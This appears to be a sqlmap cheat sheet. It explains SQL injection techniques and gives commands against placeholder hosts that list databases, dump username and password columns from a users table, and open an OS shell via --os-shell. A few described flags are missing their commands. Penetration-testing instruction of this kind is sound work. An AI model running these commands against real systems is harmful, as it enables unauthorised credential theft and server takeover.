-u URL, –url=URL Target URL (e.g. “www.target.com/vuln.php?id=1”)
–data=DATA Data string to be sent through POST
-p TESTPARAMETER Testable parameter(s)
Example command to call sqlmap to scan a URL with the opening at the search parameter using a UNION based attack technique
sqlmap -u 'http://sqlmap.test/search.php?search=n' -p search --technique=U
At the end of that command set some more properties to get the database banner ( company and version ) and show the payload with -v3
--banner -v3 --fresh-queries
The flag to display all users in the output
Flag to spit out the available databases
Pass in the databaseName and output all the tables in the database
-D databaseName --tables
Pass in tableName of databaseName and display all columns
-D databaseName -T tableName --columns
Display the output of the columns ( username and password ) from the users table in databaseName and dump the output into a file.
-D databaseName -T users -C username,password --dump
Stacked queries (S) –
This involves appending new SQL queries onto the end of the existing injectable query.
It is the preferred method to use if available, because it is capable of running anything the application database user can.
You may not necessarily be able to see the results of your stacked query in the page response, so when actually retrieving data (as opposed to performing other operations such as INSERT or DROP) you may want to use another technique such as Unions.
Union query based (U) –
This involves retrieving data by joining a second select statement to the original, via the UNION statement.
You need to be able to see the results from the original SELECT query (and hence your UNION) in the page response for this method to be usable.
Error based (E) –
This technique retrieves data by manipulating database error messages to directly display that data.
To use this method, you need to be able to see database error messages in page responses.
Inline queries (I) –
This technique uses inline database queries to retrieve data – essentially a subquery like this “SELECT (SELECT password from user) from product”. You need to be able to see the inline queries result in the page response for this to be usable through sqlmap.
Boolean blind (B) –
This retrieves data from the database by asking a series of True/False style questions in your injections, and determining the result (True or False) based on identifiable changes in the response.
To use this option, you need to be able to be able to trigger some sort of identifiable state change in HTTP response content from logically different, but syntactically correct database queries (e.g. a different page response only resulting from an invalid database query doesn’t count here).
This technique will require more requests and time to perform than those previously listed, as the data must be retrieved indirectly via boolean inference.
Time based blind (T) –
This technique is similar to boolean blind, in that it retrieves data via posing a number of True/False style questions to the database, however instead of determining the answers to these questions via the content of a response, it is done using the amount of time a response takes.
This is done through associating deliberate delays with particular answers via database statements that consume a noticeable amount of time, like sleep.
This is the most time consuming method of data retrieval, and is sensitive to errors introduced by network load.
Without careful custom configuration, you may find sqlmap selecting this technique for trickier injection vulnerabilities that can be exploited by more efficient means.
sqlmap -u http://10.10.10.10 -p parameter sqlmap -u http://10.10.10.10 --data POSTstring -p parameter sqlmap -u http://10.10.10.10 --os-shell sqlmap -u http://10.10.10.10 --dump sqlmap -u http://sqlmap.test/login.php --data='user=a&pass=b' -p user --technique=B --banner sqlmap -u http://sqlmap.test/login.php --data='user=a&pass=b' -p user --technique=B --dbs sqlmap -u http://sqlmap.test/login.php --data='user=a&pass=b' -p user --technique=B -D databaseName --tables